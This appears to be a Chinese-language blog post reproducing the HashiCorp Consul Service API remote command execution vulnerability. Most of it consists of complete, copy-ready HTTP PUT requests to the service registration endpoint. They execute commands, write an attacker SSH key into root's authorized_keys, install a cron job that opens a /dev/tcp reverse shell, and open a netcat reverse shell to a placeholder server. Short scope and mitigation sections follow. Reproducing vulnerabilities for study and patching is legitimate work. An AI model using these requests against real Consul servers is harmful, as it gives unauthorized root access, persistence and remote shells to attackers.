Hashicorp Consul Service API远程命令执行漏洞

最新推荐文章于 2024-04-24 19:38:07 发布
最新推荐文章于 2024-04-24 19:38:07 发布
阅读量2.4k 收藏 11
点赞数 11
分类专栏: 漏洞复现 文章标签: consul 漏洞复现 命令执行
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/135673444
版权

1.漏洞简介

2018年11月27日,Consul在官方博客中发布了有关Consul工具可能存在远程命令执行(RCE)漏洞的公告,并提供了防护该漏洞的配置方案。Consul是HashiCorp公司推出的一款开源工具,旨在实现分布式系统的服务发现与配置。相较于其他分布式服务注册与发现的解决方案,Consul提供更为全面的功能。它内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,无需依赖其他工具(如ZooKeeper等),使用也相对简单。由于Consul采用Go语言编写,因此具有天然的可移植性(支持Linux、Windows和Mac OS X系统);安装包中仅包含一个可执行文件,易于部署,并且能够与Docker等轻量级容器无缝配合。在特定配置下,恶意攻击者可以通过发送精心构造的HTTP请求,在未经授权的情况下在Consul服务端执行远程命令。

2.漏洞复现

验证Consul服务端存在该远程命令执行漏洞。
访问

http://ip:port/v1/agent/self

image.png
命令执行

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 357

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"test",
                "Args": ["sh", "-c","whoami"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

image.png
写 ssh 密钥。

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 357

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"test",
                "Args": ["sh", "-c","echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDIcxEKnl0blVW6jDkXRkVIlonMiely9CLouVA7YeqgHDDOIxxxx' >> /root/.ssh/authorized_keys"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

写计划任务。

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 357

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"test",
                "Args": ["sh", "-c","echo '* * * * * /bin/bash -i >& /dev/tcp/xxxxx/1234 0>&1' >> /var/spool/cron/root"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

反弹 shell。

PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token: 
Content-type: application/json
Connection: close
Content-Length: 324

{
    "ID": "bpPeMfZuAN",
    "Name": "bpPeMfZuAN",
    "Address":"127.0.0.1",
    "Port":80,
    "check":{
                "script":"nc -e /bin/sh vps_ip port",
                "Args": ["sh", "-c","nc -e /bin/sh vps_ip port"],
                "interval":"10s",
                "Timeout":"86400s"
    }
}

3.影响范围

启用了脚本检查参数(-enable-script-checks)的所有版本。

4.防范措施

  • 禁用Consul服务器上的脚本检查功能
  • 确保Consul HTTP API服务无法通过外网访问或调用
  • 对/v1/agent/service/register 禁止PUT方法

5.参考文章

https://www.imzzj.com/2019/07/04/hashicorp-consul-service-api-yuan-cheng-ming-ling-zhi-xing-lou-dong.html

LQxdp
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Druid Console 远程命令执行漏洞
墨痕诉清风的博客
02-22 1118
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。
ansible-consulHashicorp Consul集群的Ansible角色
01-31
请注意,此角色的最初设计目标更多地与Consul服务器群集环境的初始安装和引导有关,因此,当前(对所有这些)与正在进行的群集维护无关。 许多用户表示,基于Vagrant的环境可以使工作的本地Consul服务器群集环境...
consul-unauthorized:consul未授权访问
04-24
consul可以进入后台,威胁敏感信息,对网络设备进行操作
Consul ACL访问权限控制
fomeiherz的专栏
12-23 6198
提前准备 版本:V1.6.2 下载:https://www.consul.io/downloads.html 配置文件:config-acl.json { "datacenter":"tencent-datacenter", "data_dir":"/usr/local/consul-1.6.2/data", "log_file":"/usr/local/consul-1....
consul ui访问安全加固
最新发布
fangfengzhen115的专栏
04-24 644
consul ui访问安全加固
漏洞复现
热门推荐
good good study
03-03 1万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞(CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
hashicorp/consul
weixin_30387663的博客
08-17 236
https://github.com/hashicorp/consul/tree/master/vendor/github.com/boltdb/bolt 转载于:https://www.cnblogs.com/8899man/p/5779806.html
【译】保护 Consul 在特定设置中免受 RCE 风险的影响
weixin_33859665的博客
11-28 504
2018年11月27日 Consul 团队介绍我们最近注意到了一组恶意软件,它们主要针对具有允许远程执行代码这一特定配置的 Consul nodes 。 我们的社区成员也 (负责任地) 报告了此恶意软件造成的事件, 并与我们合作, 在最近版本的 Consul 中添加了一个补丁, 以保护我们免受这种威胁。这篇文章详细介绍了此恶意软件可能会如何影响用户, 具体取决于他们的配置, 并概述了我们已经采取的...
【译】Spaceflight 使用 HashiCorp Consul 进行服务发现和运行时间配置
weixin_33946020的博客
10-30 140
2017年8月10日 JAY CHRISTOPHERSON以下是Spaceflight Industries 的首席工程师 Jay Christopherson的博客。Spaceflight 正在通过提供一种新的访问太空的模式来彻底变革航天飞机业务。作为一个全面的发射服务和任务管理提供商, 该公司提供了一种简单且经济高效的产品和服务套件, 包括最先进的卫星基础设施、搭乘式发射产品和能够让企业或政府...
未授权访问漏洞
weixin_56378389的博客
04-11 1038
Redis;Docker
consul-api:Consul HTTP API的Java客户端
05-13
Consul HTTP API的Java客户端( ) 支持所有API端点( ),所有一致性模式和参数(标签,数据中心等) 如何使用 ConsulClient client = new ConsulClient ( " localhost " ); // set KV byte [] binaryData = new ...
php-consul-apiConsul APIPHP客户端实现
02-09
PHP的领事API ...该库大致基于。 版本兼容性 PHPConsulAPI版本 ...如果您在主机上定义了一些,那么执行以下命令可能是最简单的: $ config = \ DCarbone \ PHPConsulAPI \ Config :: newDefaultConfig (); 进阶设定
hashi-ui:@hashicorp Consul和Nomad的现代用户界面
02-02
哈希UI HashiCorp Consul&Nomad一个很棒的用户界面(甚至是用于移动设备!),简单明了:-)目录为什么对于Nomad而言,这非常简单,不存在针对移动设备进行优化的(某种程度上)功能完整且实时更新的界面。 对于...
HashiCorp官宣:禁止国内使用其旗下Consul等开源软件?
xcbeyond|疯狂源自梦想,技术成就辉煌
06-04 4226
点击上方“程序猿技术大咖”,关注加群讨论近日,HashiCorp官网发布了一条软件评估条款:请注意,中国出口管控条例禁止HASHICORP 在中华人民共和国境内销售或以其他方式提供企业版...
Consul是一个开源的分布式服务发现和配置管理系统,由HashiCorp公司用Go语言开发
BLOG域名:programb.blog.csdn.net
01-15 357
Consul的架构包括多个组件,例如Consul Server、Consul Agent和Consul CLI等,这些组件协同工作以实现服务发现和配置管理的功能。在Java中使用Consul,通常需要安装和配置Consul客户端,并编写相应的代码来使用Consul提供的API进行服务发现和配置管理。它提供了微服务系统中的服务治理、配置中心、控制总线等功能,这些功能中的每一个都可以根据需要单独使用,也可以一起使用以构建全方位的服务网格。需要读取配置的服务可以从Consul中读取到准确的配置信息。
操作员管理 Consul 数据中心新 Hashicorp 学习指南
weixin_33756418的博客
01-21 92
JAN 17 2019 KAIT CARTERHashicorp 学习平台的创建是为了帮助您和您的团队学习 Hashicorp 工具, 您可以在 learn.hashicorp.com访问它。最新发布的培训内容侧重于对运营商的教育, 并已分为两个轨道:第一天:部署第一个数据中心 系列和 第二天:高级操作 系列。了解内容概述第一天:部署第一个数据中心系列旨在帮助操作员设置一个健康的数据中心,它提供了...
微服务架构 | 3.4 HashiCorp Consul 注册中心
多氯环己烷的博客
01-18 2894
Consul 是一套开源的分布式服务发现和配置管理系统,由 HashiCorp 公司用 Go 语言开发。它提供了微服务系统中的服务治理、配置中心、控制总线等功能。这些功能中的每一个都可以根据需要单独使用,也可以一起使用以构建全方位的服务网格,总之 Consul 提供了一种完整的服务网格解决方案;
consul ui无法访问的问题解决
HQ DevJ的专栏
11-10 7425
在云服务器上启动了consul,但是访问不了8500端口,这里需要在服务器启动的时候,加上-client的指定 ./consul agent -dev这是最开始启动的命令只能本机访问 当使用下面命令的时候就可以其他机器进行访问了: ./consul agent -dev -client 0.0.0.0 -ui 外部机器就可以访问 ...
consul启动命令
07-28
Consul 是一个分布式服务发现和配置管理系统。要启动 Consul,你可以使用以下命令: ``` consul agent -dev ``` 这个命令会以开发模式启动 Consul 代理。在开发模式下,Consul 会以单节点模式运行,并使用本地文件系统作为后端存储。这对于在开发环境中进行测试和调试非常方便。 如果你想要使用自定义的配置文件来启动 Consul,可以使用以下命令: ``` consul agent -config-file=<path_to_config_file> ``` 在上面的命令中,将 `<path_to_config_file>` 替换为你的配置文件的路径。 当 Consul 代理成功启动后,你就可以通过 API 或者命令行工具与 Consul 进行交互了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值